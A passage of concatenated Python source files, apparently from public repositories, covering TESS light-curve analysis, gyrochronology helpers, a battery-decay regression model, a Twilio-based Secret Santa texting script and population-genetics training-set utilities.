run_dir = '/Users/james/Desktop/helloTESS/',
clobber=False):
'''
Run the basic set of tools on every light curve
Produce a diagnostic plot for each light curve
Save a file on Rotation stats and a file on Flare stats
'''
print('running ' + tess_dir + sector)
files_i = glob(tess_dir + sector + '/*.fits', recursive=True)
print(str(len(files_i)) + ' .fits files found')
# arrays to hold outputs
per_out = np.zeros(len(files_i)) -1
per_amp = np.zeros(len(files_i)) -1
per_med = np.zeros(len(files_i)) -1
per_std = np.zeros(len(files_i)) -1
ACF_1pk = np.zeros(len(files_i)) -1
ACF_1dt = np.zeros(len(files_i)) -1
blsPeriod = np.zeros(len(files_i)) -1
blsAmpl = np.zeros(len(files_i)) -1
EclNum = np.zeros(len(files_i)) -1
EclDep = np.zeros(len(files_i)) -1
FL_id = np.array([])
FL_t0 = np.array([])
FL_t1 = np.array([])
FL_f0 = np.array([])
FL_f1 = np.array([])
if not os.path.isdir(run_dir + 'figures/' + sector):
os.makedirs(run_dir + 'figures/' + sector)
plt.ioff()
for k in range(len(files_i)):
# print(files_i[k])
if k % 1000 == 0:
print(str(k) + '/'+str(len(files_i)))
tbl = -1
df_tbl = -1
try:
tbl = Table.read(files_i[k], format='fits')
df_tbl = tbl.to_pandas()
except (OSError, KeyError, TypeError, ValueError):
print('k=' + str(k) + ' bad file: ' + files_i[k])
# this is a bit clumsy, but it made sense at the time when trying to chase down some bugs...
if tbl != -1:
# make harsh quality cuts, and chop out a known bad window of time (might add more later)
AOK = (tbl['QUALITY'] == 0) & ((tbl['TIME'] < 1347) | (tbl['TIME'] > 1350))
med = np.nanmedian(df_tbl['PDCSAP_FLUX'][AOK])
# ACF w/ Exoplanet package
acf = xo.autocorr_estimator(tbl['TIME'][AOK], tbl['PDCSAP_FLUX'][AOK] / med,
yerr=tbl['PDCSAP_FLUX_ERR'][AOK] / med,
min_period=0.07, max_period=27, max_peaks=2)
if len(acf['peaks']) > 0:
ACF_1dt[k] = acf['peaks'][0]['period']
ACF_1pk[k] = acf['autocorr'][1][np.where((acf['autocorr'][0] == acf['peaks'][0]['period']))[0]][0]
s_window = int(ACF_1dt[k] / np.abs(np.nanmedian(np.diff(tbl['TIME']))) / 6.)
else:
s_window = 128
# do a running median for a basic smooth
# smo = (df_tbl['PDCSAP_FLUX'][AOK].rolling(128, center=True).median() + df_tbl['PDCSAP_FLUX'][AOK].rolling(256, center=True).median()) / 2.
smo = df_tbl['PDCSAP_FLUX'][AOK].rolling(s_window, center=True).median()
# make an output plot for every file
figname = run_dir + 'figures/' + sector + '/' + files_i[k].split('/')[-1] + '.jpeg' #run_dir + 'figures/longerP/' + TICs[0].split('-')[2] + '.jpeg'
makefig = ((not os.path.exists(figname)) | clobber)
if makefig:
plt.figure(figsize=(12,9))
plt.errorbar(tbl['TIME'][AOK], tbl['PDCSAP_FLUX'][AOK]/med, yerr=tbl['PDCSAP_FLUX_ERR'][AOK]/med,
linestyle=None, alpha=0.15, label='PDC_FLUX')
plt.plot(tbl['TIME'][AOK], smo/med, label=str(s_window)+'pt MED')
if (ACF_1dt[k] > 0):
plt.plot(tbl['TIME'][AOK],
np.nanstd(smo / med) * ACF_1pk[k] * np.sin(tbl['TIME'][AOK] / ACF_1dt[k] * 2 * np.pi) + 1,
label='ACF=' + format(ACF_1dt[k], '6.3f') + 'd, pk=' + format(ACF_1pk[k], '6.3f'), lw=2,
alpha=0.7)
# plt.errorbar(tbl['TIME'][AOK], tbl['SAP_FLUX'][AOK]/Smed, yerr=tbl['SAP_FLUX_ERR'][AOK]/Smed,
# linestyle=None, alpha=0.25, label='SAP_FLUX')
# require at least 1000 good datapoints for analysis
if sum(AOK) > 1000:
# find OK points in the smoothed LC
SOK = np.isfinite(smo)
# do some SPLINE'ing
# spl = IRLSSpline(df_tbl['TIME'].values[AOK][SOK], df_tbl['PDCSAP_FLUX'].values[AOK][SOK] / med,
# df_tbl['PDCSAP_FLUX_ERR'].values[AOK][SOK] / med)
# flares
FL = FINDflare((df_tbl['PDCSAP_FLUX'][AOK][SOK] - smo[SOK])/med,
df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK]/med,
N1=4, N2=2, N3=5, avg_std=False)
if np.size(FL) > 0:
for j in range(len(FL[0])):
FL_id = np.append(FL_id, k)
FL_t0 = np.append(FL_t0, FL[0][j])
FL_t1 = np.append(FL_t1, FL[1][j])
FL_f0 = np.append(FL_f0, med)
FL_f1 = np.append(FL_f1, np.nanmax(tbl['PDCSAP_FLUX'][AOK][SOK][(FL[0][j]):(FL[1][j]+1)]))
if makefig:
if np.size(FL) > 0:
for j in range(len(FL[0])):
plt.scatter(tbl['TIME'][AOK][SOK][(FL[0][j]):(FL[1][j]+1)],
tbl['PDCSAP_FLUX'][AOK][SOK][(FL[0][j]):(FL[1][j]+1)] / med, color='r',
label='_nolegend_')
plt.scatter([],[], color='r', label='Flare?')
# Lomb Scargle
LS = LombScargle(df_tbl['TIME'][AOK], df_tbl['PDCSAP_FLUX'][AOK]/med, dy=df_tbl['PDCSAP_FLUX_ERR'][AOK]/med)
frequency, power = LS.autopower(minimum_frequency=1./40.,
maximum_frequency=1./0.1,
samples_per_peak=7)
best_frequency = frequency[np.argmax(power)]
per_out[k] = 1./best_frequency
per_amp[k] = np.nanmax(power)
per_med[k] = np.nanmedian(power)
per_std[k] = np.nanstd(smo[SOK]/med)
if np.nanmax(power) > 0.05:
LSmodel = LS.model(df_tbl['TIME'][AOK], best_frequency)
if makefig:
plt.plot(df_tbl['TIME'][AOK], LSmodel,
label='L-S P='+format(1./best_frequency, '6.3f')+'d, pk='+format(np.nanmax(power), '6.3f'))
# here is where a simple Eclipse (EB) finder goes
# EE = EasyE(smo[SOK]/med, df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK]/med,
# N1=5, N2=3, N3=2)
EE = EasyE(df_tbl['PDCSAP_FLUX'][AOK][SOK]/med - smo[SOK]/med,
df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK] / med, N1=5, N2=2.5, N3=2.5)
# N1 datapoints long, and
# N2 times below the stddev, and
# N3 times below the error
if (np.size(EE) > 0):
# need to test if EE outputs look periodic-ish, or just junk...
noE = np.arange(len(SOK))
for j in range(len(EE[0])):
if makefig:
plt.scatter(tbl['TIME'][AOK][SOK][(EE[0][j]):(EE[1][j]+1)],
df_tbl['PDCSAP_FLUX'][AOK][SOK][(EE[0][j]):(EE[1][j]+1)] / med,
color='k', marker='s', s=5, alpha=0.75, label='_nolegend_')
noE[(EE[0][j]):(EE[1][j]+1)] = -1
EclDep[k] = EclDep[k] + np.nanmin(df_tbl['PDCSAP_FLUX'][AOK][SOK][(EE[0][j]):(EE[1][j] + 1)] / med - smo[SOK][(EE[0][j]):(EE[1][j] + 1)]/med)
if makefig:
plt.scatter([],[], color='k', marker='s', s=5, alpha=0.75, label='Ecl: '+str(len(EE[0])))
EclNum[k] = len(EE[0])
EclDep[k] = EclDep[k] / np.float(len(EE[0]))
okE = np.where((noE > -1))[0]
else:
okE = np.arange(len(SOK))
# do some GP'ing, from:
# https://exoplanet.dfm.io/en/stable/tutorials/stellar-variability/
# if False:
# with pm.Model() as model:
#
# # The mean flux of the time series
# mean = pm.Normal("mean", mu=1.0, sd=10.0)
#
# # A jitter term describing excess white noise
# # print(AOK.shape, SOK.shape, okE.shape)
# yerr = df_tbl['PDCSAP_FLUX_ERR'].values[AOK][SOK] / med
# y = df_tbl['PDCSAP_FLUX'].values[AOK][SOK] / med
# x = df_tbl['TIME'].values[AOK][SOK]
#
# logs2 = pm.Normal("logs2", mu=2 * np.log(np.min(yerr)), sd=5.0)
#
# # The parameters of the RotationTerm kernel
# logamp = pm.Normal("logamp", mu=np.log(np.var(y)), sd=5.0)
# logperiod = pm.Normal("logperiod", mu=np.log(acf['peaks'][0]['period']), sd=5.0)
# logQ0 = pm.Normal("logQ0", mu=1.0, sd=10.0)
# logdeltaQ = pm.Normal("logdeltaQ", mu=2.0, sd=10.0)
# mix = pm.Uniform("mix", lower=0, upper=1.0)
#
# # Track the period as a deterministic
# period = pm.Deterministic("period", tt.exp(logperiod))
#
# # Set up the Gaussian Process model
# kernel = xo.gp.terms.RotationTerm(
# log_amp=logamp,
# period=period,
# log_Q0=logQ0,
# log_deltaQ=logdeltaQ,
# mix=mix
# )
# gp = xo.gp.GP(kernel, x, yerr ** 2 + tt.exp(logs2), J=4)
#
# # Compute the Gaussian Process likelihood and add it into the
# # the PyMC3 model as a "potential"
# pm.Potential("loglike", gp.log_likelihood(y - mean))
#
# # Compute the mean model prediction for plotting purposes
# pm.Deterministic("pred", gp.predict())
#
# # Optimize to find the maximum a posteriori parameters
# map_soln = xo.optimize(start=model.test_point)
#
# gpspl = map_soln["pred"]
# plt.plot(df_tbl['TIME'].values[AOK][SOK], gpspl+1, label='GP')
# add BLS
bls = BoxLeastSquares(df_tbl['TIME'][AOK][SOK], smo[SOK]/med, dy=df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK]/med)
blsP = bls.autopower([0.05], method='fast', objective='snr',
minimum_n_transit=3, minimum_period=0.1, maximum_period=15,
frequency_factor=1.5)
blsPer = blsP['period'][np.argmax(blsP['power'])]
if ((np.nanmax(blsP['power']) > 2.5*np.nanstd(blsP['power']) + np.nanmedian(blsP['power']) ) &
# (np.nanmax(blsP['power']) > 10.) &
(blsPer < 0.95 * np.nanmax(blsP['period']))
):
blsPeriod[k] = blsPer
blsAmpl[k] = np.nanmax(blsP['power'])
if makefig:
plt.plot([],[], ' ', label='BLS='+format(blsPer, '6.3f')+'d, snr='+format(np.nanmax(blsP['power']), '6.3f'))
if makefig:
# plt.plot(df_tbl['TIME'].values[AOK][SOK], spl, label='spl')
plt.title(files_i[k].split('/')[-1] + ' k='+str(k), fontsize=12)
plt.ylabel('Flux')
plt.xlabel('BJD - 2457000 (days)')
plt.legend(fontsize=10)
# plt.show()
plt.savefig(figname, bbox_inches='tight', pad_inches=0.25, dpi=100)
plt.close()
# reset the data again, not needed, but juuuuuust in case
del tbl
del df_tbl
del AOK
gc.collect()
# write per-sector output files
ALL_TIC = pd.Series(files_i).str.split('-', expand=True).iloc[:,-3].astype('int')
flare_out = pd.DataFrame(data={'TIC':ALL_TIC[FL_id], 'i0':FL_t0, 'i1':FL_t1, 'med':FL_f0, 'peak':FL_f1})
flare_out.to_csv(run_dir + 'outputs/' + sector + '_flare_out.csv')
rot_out = pd.DataFrame(data={'TIC':ALL_TIC,
'LSper':per_out, 'LSamp':per_amp, 'LSmed':per_med, 'LSstd':per_std,
'acf_pk':ACF_1pk, 'acf_per':ACF_1dt,
'bls_per':blsPeriod, 'bls_ampl':blsAmpl,
'ecl_num':EclNum, 'ecl_dep':EclDep})
rot_out.to_csv(run_dir + 'outputs/' + sector + '_rot_out.csv')
if __name__ == "__main__":
'''
let this file be called from the terminal directly. e.g.:
$ python analysis.py
'''
BasicActivity(sys.argv[1])
``` |
{
"source": "jradavenport/P_e_window",
"score": 3
} |
#### File: jradavenport/P_e_window/thegrid.py
```python
import numpy as np
def phase_coverage(time, E1_TIME, E2_TIME, e_window=0.5, minP=-1, maxP=-1,
return_coverage=True, downsample=True):
if minP<0:
minP = np.abs(E1_TIME - E2_TIME)
if maxP<0:
maxP = (np.max(time) - np.min(time)) + minP
P = np.arange(minP, maxP+e_window, e_window)
E = np.arange(0, 1 + e_window/maxP, e_window/maxP)
if return_coverage:
PP, EE = np.meshgrid(P, E, indexing='ij')
coverage = np.zeros_like(EE)
pc = np.zeros_like(P)
is1 = np.zeros_like(P)
is2 = np.zeros_like(P)
if downsample:
hh, be = np.histogram(time, bins = np.arange(np.min(time), np.max(time), e_window/2))
time = ((be[1:]+be[:-1])/2)[np.where((hh > 0))[0]]
oki = np.where(((time < (E2_TIME - e_window)) | (time > (E2_TIME + e_window))) &
((time < (E1_TIME - e_window)) | (time > (E1_TIME + e_window)))
)[0]
for i in range(len(P)):
win_i = e_window / P[i] # the eclipse window size in phase to examine at this period
if return_coverage:
coverage[i,:-1], _ = np.histogram(((time[oki] - E1_TIME) % P[i]) / P[i], bins=E)
pc_i = ((E2_TIME - E1_TIME) % P[i]) / P[i]
phase_i = ((time[oki] - E1_TIME) % P[i]) / P[i]
is1[i] = sum((phase_i <= win_i) | (phase_i >= (1-win_i)))
is2[i] = sum((phase_i >= (pc_i - win_i)) & (phase_i <= (pc_i + win_i)))
if return_coverage:
return P, is1, is2, PP, EE, coverage
else:
return P, is1, is2
``` |
{
"source": "jradavenport/rapid-spin-down",
"score": 2
} |
#### File: rapid-spin-down/code/stuff.py
```python
import numpy as np
def Barnes2003_I(BV,t):
'''
interface gyrochrone
eqns 1 & 2 from Barnes (2003)
t in Myr
'''
P = np.sqrt(t) * np.sqrt(BV - 0.5) - 0.15 * (BV - 0.5)
return P
def Barnes2003_C(BV,t):
'''
convective gyrochrone
eqn 15 from Barnes (2003)
t in Myr
'''
PI = Barnes2003_I(BV,t)
P = 0.2 * np.exp(t / (100* (BV + 0.1 - (t/3000))**3))
bd = np.where((P >= PI))[0]
if len(bd) > 0:
P[bd] = np.nan
return P
def bv2teff(BV, logg=4.3, feh=0):
"""
Relation from Sekiguchi & Fukugita (2000)
https://arxiv.org/abs/astro-ph/9904299
"""
# Full Sample, Tbl 3
c = np.array([3.939654, -0.395361, 0.2082113, -0.0604097])
f1, f2, g1, h1 = 0.027153, 0.005036, 0.007367, -0.01069
logTeff = c[0] + c[1]*BV + c[2]*(BV**2) + c[3]*(BV**3) + \
f1*feh + f2*(feh**2) + \
g1*logg + h1*BV*logg
return 10**logTeff
def BarnesPdot(BV, time):
'''
taking the derivative
'''
dt = time[1]-time[0] # in Myr
P = Barnes2003_C(BV, time) # in days
return np.gradient(P)/365.25/1e6 / dt # unitless
def OmC(BV,time, T=10, f=1):
'''
assume 10yr observing baseline
following helpful math from JJ Hermes' webpage
http://jjherm.es/research/omc.html
'''
P = Barnes2003_C(BV, time)
Pdot = BarnesPdot(BV,time) * f # a fudge-factor to explore
OC = Pdot / (2*P) * ((T*365.25)**2) # in days
OC = OC * 24*60 # in min
return OC
def twogaus(x, a1, x01, sigma1, a2, x02, sigma2, c):
model = (a1 * np.exp(-(x - x01)**2 / (2 * sigma1**2)) +
a2 * np.exp(-(x - x02)**2 / (2 * sigma2**2)) +
a1 * np.exp(-(x - x01 - 1)**2 / (2 * sigma1**2)) +
a2 * np.exp(-(x - x02 - 1)**2 / (2 * sigma2**2)) +
a1 * np.exp(-(x - x01 + 1)**2 / (2 * sigma1**2)) +
a2 * np.exp(-(x - x02 + 1)**2 / (2 * sigma2**2)) + c)
return model
def gaus(x, a, x0, sigma, b):
"""
Simple Gaussian function
Parameters
----------
x : float or 1-d numpy array
The data to evaluate the Gaussian over
a : float
the amplitude
b : float
the constant offset
x0 : float
the center of the Gaussian
sigma : float
the width of the Gaussian
Returns
-------
Array or float of same type as input (x).
"""
return a * np.exp(-(x - x0)**2 / (2 * sigma**2)) + b
``` |
{
"source": "jradding10/Decay",
"score": 3
} |
#### File: jradding10/Decay/decay_ml.py
```python
import sys
import copy
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor
from sklearn import tree
from sklearn.metrics import mean_squared_error as MSE
def ml_battery_dt(battery_data):
'''
trains the decision tree regression model
Arguments:
battery_data(string): user inputed name of csv file
Returns:
dt.fit: regression model
'''
global X_train, X_test, y_train, y_test
cell_data = pd.read_csv(battery_data)
X = cell_data[['Cycle_Index', 'Test_Time (s)', 'Min_Voltage (V)']]
y = cell_data['Discharge_Energy (Wh)']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
dt = DecisionTreeRegressor(max_depth=20, min_samples_leaf=0.1,
random_state=3)
dt.fit(X_train.values, y_train.values) # added values w/o feature
return dt
def ml_battery_RMS(dt):
'''s
Returns:
rmse_dt(float): root means squared error of data
source: https://www.youtube.com/watch?v=ksvJDLdc9eA&ab_channel=DataCamp
'''
y_pred = dt.predict(X_test.values) # added values without feature
mse_dt = MSE(y_test, y_pred)
rmse_dt = mse_dt ** (1/2)
return rmse_dt
if __name__ == '__main__':
'''
Main takes input files from user and outputs RMSE and visual
'''
try:
battery_data = sys.argv[1] # user selects file
except IOError:
print("Unable to open " + battery_data)
print("Format your entry like this:\npy python-file-name.py csv-file-name.csv")
exit()
# train the battery
dt = ml_battery_dt(battery_data)
# output visual in dot file
print("RMSE CALCULATED: " + str(ml_battery_RMS(dt)))
# output visual in dot file
out_tree_vis = tree.export_graphviz(dt, out_file='battery_datatree.dot',
feature_names=['Cycle Index', 'Test Time',
'Min Voltage'], filled=True)
# above source https://mljar.com/blog/visualize-decision-tree/
``` |
{
"source": "jrade/JrBoost",
"score": 2
} |
#### File: Python/example/iris.py
```python
import itertools, pickle, os, time
import numpy as np
import pandas as pd
import jrboost
#-----------------------------------------------------------------------------------------------------------------------
validationParam = {
'threadCount': os.cpu_count() // 2,
'parallelTree': False,
'foldCount': 10,
}
trainParam = {
'minimizeAlgorithm': jrboost.minimizePopulation,
'repetionCount': 1,
'foldCount': 3,
'targetLossFun': jrboost.logLoss,
'boostParamGrid': {
'iterationCount': [300],
'eta': [0.001, 0.0015, 0.002, 0.003, 0.005, 0.007, 0.01, 0.015, 0.02, 0.03, 0.05, 0.07, 0.1, 0.15, 0.2, 0.3, 0.5, 0.7, 1.0],
'usedSampleRatio': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
'usedVariableRatio': [0.5],
'minNodeSize': [1, 2, 3],
'maxTreeDepth': [1, 2, 3, 4],
'minRelSampleWeight': [0.01],
#'saveMemory': [True],
#'stratifiedSamples': [False],
'selectVariablesByLevel': [True],
#'fastExp': [False],
},
'minimizeParam' : {
'populationCount': 100,
'survivorCount': 50,
'cycleCount': 2,
'bestCount': 10,
}
}
#-----------------------------------------------------------------------------------------------------------------------
def main():
print(f'validation: {validationParam}\n')
print(f'train: {trainParam}\n')
if 'threadCount' in validationParam: jrboost.setThreadCount(validationParam['threadCount'])
if 'parallelTree' in validationParam: jrboost.setParallelTree(validationParam['parallelTree'])
outerFoldCount = validationParam['foldCount']
inDataFrame, outDataSeries = loadData()
outDataFrame = jrboost.oneHotEncode(outDataSeries)
samples = outDataFrame.index
variables = inDataFrame.columns
labels = outDataFrame.columns
print(f'{len(samples)} samples, {len(variables)} variables\n')
confusionFrame = pd.DataFrame(index = labels, columns = labels, data = 0)
inData = inDataFrame.to_numpy(dtype = np.float32)
for i in itertools.count():
print(f'-------------------- {i} --------------------\n')
t = -time.time()
jrboost.PROFILE.START()
predOutDataFrame = pd.DataFrame(index = samples, columns = labels, dtype = np.float64)
for label in labels:
print(label)
outData = outDataFrame[label].to_numpy(dtype = np.uint64)
predOutData = np.empty((len(samples),))
folds = jrboost.stratifiedRandomFolds(outData, outerFoldCount)
for trainSamples, testSamples in folds:
trainInData = inData[trainSamples, :]
trainOutData = outData[trainSamples]
_, predictor, medianBoostParam = jrboost.train(trainInData, trainOutData, trainParam)
print(formatBoostParam(medianBoostParam))
testInData = inData[testSamples, :]
predOutData[testSamples] = predictor.predict(testInData)
predOutDataFrame[label] = predOutData
print()
print()
t += time.time()
print(jrboost.PROFILE.STOP())
print(f'{t:.2f}s\n')
predOutDataSeries = predOutDataFrame.idxmax(axis = 1)
for sample in samples:
confusionFrame.loc[outDataSeries[sample], predOutDataSeries[sample]] += 1
print((confusionFrame / (i + 1)).to_string(float_format = lambda x: f'{x:.2f}') + '\n')
#-----------------------------------------------------------------------------------------------------------------------
def loadData():
dataPath = '../Data/Iris/Iris.csv'
dataFrame = pd.read_csv(dataPath, sep = ',', index_col = 0)
outDataSeries = dataFrame['Species']
inDataFrame = dataFrame.drop(['Species'], axis = 1)
return inDataFrame, outDataSeries
def formatBoostParam(boostParam):
eta = boostParam['eta']
md = boostParam.get('maxTreeDepth', 1)
usr = boostParam['usedSampleRatio']
mns = boostParam['minNodeSize']
return f' eta = {eta:.4f} md = {md} usr = {usr:.1f} mns = {mns}'
#-----------------------------------------------------------------------------------------------------------------------
main()
#result (average of 100 runs)
#
#Species Iris-setosa Iris-versicolor Iris-virginica
#Species
#Iris-setosa 50.0 0.00 0.00
#Iris-versicolor 0.0 46.85 3.15
#Iris-virginica 0.0 3.22 46.78
``` |
{
"source": "jradek/python-rest-vs-graphql",
"score": 2
} |
#### File: graphql/schema/author.py
```python
from data import Author, all_authors, get_author
from graphql.type.definition import GraphQLResolveInfo
from schema.types import query
AUTHOR_TYPEDEF = """
type Author {
id: ID!
name: String!
}
"""
@query.field("authors")
def resolve_authors(_, info: GraphQLResolveInfo):
return all_authors()
@query.field("author")
def resolve_author(_, info: GraphQLResolveInfo, id: str) -> Author:
return get_author(int(id))
``` |
{
"source": "jradis/secretsanta",
"score": 3
} |
#### File: jradis/secretsanta/secretsanta.py
```python
import pandas as pd
from twilio.rest import Client
import random
import giphy_client
from giphy_client.rest import ApiException
import time
########################
# SET CONSTANT VARIABLES
########################
santa_message = '''{0}, you have the pleasure of participating in this years friends' gift exchange! Santa has picked you to give a gift to {1}. Date of the Christmas party is TBD. Just make sure you don\'t fuck it up... Oh, and Merry Christmas!!! Ho Ho HO!!!'''
elf_message_1 = '''{0}, you have been chosen to be head elf for a gift exchange. Lucky You. Someone Trusts and/or loves you... Or has nobody else to turn to... lol... Anyways, here is a list of each person, their number and who they are assigned to give a gift. It\'s likely you wont be contacted but in the case that you are it is probably because someone fucked up and forgot who they have. Thanks for being loved!!! Oh, and Merry Christmas!!!'''
elf_message_2 = '''Anyways, here is their info and who has who, just in case:'''
TESTING = False # When set to true, random seed is set to 7 and prints results for verification. When set to False new random seed is set and text messages are sent.
########################
##############################
# LOAD CONFIGURATION VARIABLES
##############################
# SET RANDOM SEED
if TESTING:
random.seed(7)
else:
random.seed(13)
# GET API INFO AND KEYS
config_info = pd.read_csv('api_config.csv')
ACCOUNT = config_info.loc[config_info['key'] == 'ACCOUNT']['value'].values[0] # Twilio Account
AUTH = config_info.loc[config_info['key'] == 'AUTH']['value'].values[0] # Twilio API Key
FROM = config_info.loc[config_info['key'] == 'FROM']['value'].values[0] # Twilio Phone Number
GIPHY = config_info.loc[config_info['key'] == 'GIPHY']['value'].values[0] # GIPHY API Key
# Configure Twilio Client
client = Client(ACCOUNT, AUTH)
##############################
##################
# HELPER FUNCTIONS
##################
def add_christmas_gify():
return '{0}'.format(get_random_santa_gif())
def get_random_santa_gif(api_key=GIPHY, tag='christmas', rating='PG-13', fmt='json'):
api_instance = giphy_client.DefaultApi()
api_key = api_key
tag = tag
rating = rating
fmt = fmt
try:
# Random Sticker Endpoint
api_response = api_instance.gifs_random_get(api_key, tag=tag, rating=rating, fmt=fmt)
return api_response.to_dict()['data']['image_original_url']
except ApiException as e:
print("Exception when calling DefaultApi->stickers_random_get: %s\n" % e)
return None
def send_sms(body, test, TO, client=client, FROM=FROM, media=None):
if test:
print('MSG:', body)
print('Number:', TO)
print('Media:', media)
else:
client.messages.create(
to=TO,
from_=FROM,
body=body,
media_url=media)
time.sleep(10) # Adding to try and avoid getting marked as spam by carrier
##################
#############
# PICK SANTAS
#############
# Parse persons info
people_info = pd.read_csv('santas.csv', dtype={'number': 'str'})
santas_info = people_info.loc[people_info['type'] == 'Santa'][['name', 'number', 'relationship']]
## To-do Split relationships directly from csv. Auto-detect if relationships exist.
relationships = santas_info[~santas_info['relationship'].isnull()].set_index('name').to_dict()['relationship']
santas_info = santas_info[['name', 'number']].set_index('name').to_dict('index')
elf_info = people_info.loc[people_info['type'] != 'Santa'][['name', 'number']]
santas = list(santas_info.keys())
options = list(santas_info.keys())
random.shuffle(santas)
random.shuffle(options)
# Elegantly making it so you don't ever have to reshuffle.
# pick random relationship to set to first and second to last
coupled = random.choice(list(relationships.keys()))
# Set one member of the couple to be the very first of the santas
santas.insert(0, santas.pop(santas.index(coupled)))
# Move the other member of the relationship to be the second to last.
santas.insert(-1, santas.pop(santas.index(relationships[coupled])))
# Move the other member of the relationship to be the very first position of the options
options.insert(0, options.pop(options.index(relationships[coupled])))
# If the last santa is also in a relationship, make sure that that
if santas[-1] in relationships.keys():
options.insert(0, options.pop(options.index(santas[-1])))
options.insert(0, options.pop(options.index(relationships[options[0]])))
pairs = {}
for i, santa in enumerate(santas):
if i == 0:
gives_to = santas[-1]
options.remove(santas[-1])
pairs[santa] = gives_to
else:
bad_match = [santa]
if santa in relationships.keys():
bad_match.append(relationships[santa])
if options[0] not in bad_match:
gives_to = options[0]
elif options[1] not in bad_match:
gives_to = options[1]
else:
gives_to = options[2]
options.remove(gives_to)
pairs[santa] = gives_to
#############
###############
# SEND MESSAGES
###############
for pair in pairs:
santas_info[pair]['gives to'] = pairs[pair]
to_num = santas_info[pair]['number']
msg = santa_message.format(pair, pairs[pair])
send_sms(msg, TO=to_num, test=TESTING, media=add_christmas_gify())
send_sms(elf_message_1.format(elf_info.name.values[0]), TO=elf_info.number.values[0], test=TESTING, media=add_christmas_gify())
time.sleep(60) # Adding to try and avoid getting marked as spam by carrier
send_sms(elf_message_2 + '\n\n' + str(santas_info), TO=elf_info.number.values[0], test=TESTING)
#############
``` |
{
"source": "jradrion/diploSHIC",
"score": 2
} |
#### File: jradrion/diploSHIC/makeTrainingSets.py
```python
import sys, os, random
neutTrainingFileName, softTrainingFilePrefix, hardTrainingFilePrefix, sweepTrainingWindows, linkedTrainingWindows, outDir = sys.argv[1:]
#sweepTrainingWindows and linkedTrainingWindows are comma-separated lists
sweepFilePaths, linkedFilePaths = {}, {}
for trainingFilePrefix in [softTrainingFilePrefix, hardTrainingFilePrefix]:
trainingSetDir = "/".join(trainingFilePrefix.split("/")[:-1])
trainingFilePrefixDirless = trainingFilePrefix.split("/")[-1]
linkedWins = [int(x) for x in linkedTrainingWindows.split(",")]
sweepWins = [int(x) for x in sweepTrainingWindows.split(",")]
linkedFilePaths[trainingFilePrefix] = []
sweepFilePaths[trainingFilePrefix] = []
for fileName in os.listdir(trainingSetDir):
if fileName.startswith(trainingFilePrefixDirless):
winNum = int(fileName.split("_")[1].split(".")[0])
if winNum in linkedWins:
linkedFilePaths[trainingFilePrefix].append(trainingSetDir + "/" + fileName)
elif winNum in sweepWins:
sweepFilePaths[trainingFilePrefix].append(trainingSetDir + "/" + fileName)
def getExamplesFromFVFile(simFileName):
try:
simFile = open(simFileName,'rt')
lines = [line.strip() for line in simFile.readlines() if not "nan" in line]
header = lines[0]
examples = lines[1:]
simFile.close()
return header, examples
except Exception:
return "", []
def getExamplesFromFVFileLs(simFileLs):
examples = []
keptHeader = ""
for filePath in simFileLs:
header, currExamples = getExamplesFromFVFile(filePath)
if header:
keptHeader = header
examples += currExamples
return keptHeader, examples
def getMinButNonZeroExamples(lsLs):
counts = []
for ls in lsLs:
if len(ls) > 0:
counts.append(len(ls))
if not counts:
raise Exception
return min(counts)
header, neutExamples = getExamplesFromFVFile(neutTrainingFileName)
linkedSoftHeader, linkedSoftExamples = getExamplesFromFVFileLs(linkedFilePaths[softTrainingFilePrefix])
softHeader, softExamples = getExamplesFromFVFileLs(sweepFilePaths[softTrainingFilePrefix])
linkedHardHeader, linkedHardExamples = getExamplesFromFVFileLs(linkedFilePaths[hardTrainingFilePrefix])
hardHeader, hardExamples = getExamplesFromFVFileLs(sweepFilePaths[hardTrainingFilePrefix])
trainingSetLs = [linkedSoftExamples, softExamples, linkedHardExamples, hardExamples,neutExamples]
numExamplesToKeep = getMinButNonZeroExamples(trainingSetLs)
for i in range(len(trainingSetLs)):
random.shuffle(trainingSetLs[i])
trainingSetLs[i] = trainingSetLs[i][:numExamplesToKeep]
linkedSoftExamples, softExamples, linkedHardExamples, hardExamples, neutExamples = trainingSetLs
outFileNames = ["neut.fvec", "linkedSoft.fvec", "soft.fvec", "linkedHard.fvec", "hard.fvec"]
outExamples = [neutExamples, linkedSoftExamples, softExamples, linkedHardExamples, hardExamples]
for i in range(len(outFileNames)):
if outExamples[i]:
outFile = open(outDir +"/"+ outFileNames[i], "w")
outFile.write(hardHeader+"\n")
for example in outExamples[i]:
outFile.write("%s\n" %(example))
outFile.close()
```
#### File: jradrion/diploSHIC/msTools.py
```python
import sys
import gzip
import bisect
def getSnpsOverflowingChr(newPositions, totalPhysLen):
overflowers = []
for i in reversed(range(len(newPositions))):
if newPositions[i] > totalPhysLen:
overflowers.append(newPositions[i])
return overflowers
def fillInSnpSlotsWithOverflowers(newPositions, totalPhysLen, overflowers):
posH = {}
for pos in newPositions:
posH[pos] = 1
for i in range(len(overflowers)):
del newPositions[-1]
for pos in reversed(range(1, totalPhysLen+1)):
if pos not in posH:
bisect.insort_left(newPositions, pos)
overflowers.pop()
if len(overflowers) == 0:
break
def msPositionsToIntegerPositions(positions, totalPhysLen):
snpNum = 1
prevPos = -1
prevIntPos = -1
newPositions = []
for position in positions:
assert position >= 0 and position < 1., "Mutations positions must all be in [0, 1)"
assert position >= prevPos
origPos = position
if position == prevPos:
position += 0.000001
prevPos = origPos
intPos = int(totalPhysLen*position)
if intPos == 0:
intPos = 1
if intPos <= prevIntPos:
intPos = prevIntPos + 1
prevIntPos = intPos
newPositions.append(intPos)
overflowers = getSnpsOverflowingChr(newPositions, totalPhysLen)
if overflowers:
fillInSnpSlotsWithOverflowers(newPositions, totalPhysLen, overflowers)
assert len(newPositions) == len(positions)
assert all(newPositions[i] <= newPositions[i+1]
for i in range(len(newPositions)-1))
assert newPositions[-1] <= totalPhysLen
return newPositions
def msRepToHaplotypeArrayIn(samples, positions, totalPhysLen, transposeHaps, discretizePositions=True):
for i in range(len(samples)):
assert len(samples[i]) == len(positions)
if discretizePositions:
positions = msPositionsToIntegerPositions(positions, totalPhysLen)
if transposeHaps:
hapArrayIn = []
for j in range(len(positions)):
hapArrayIn.append([])
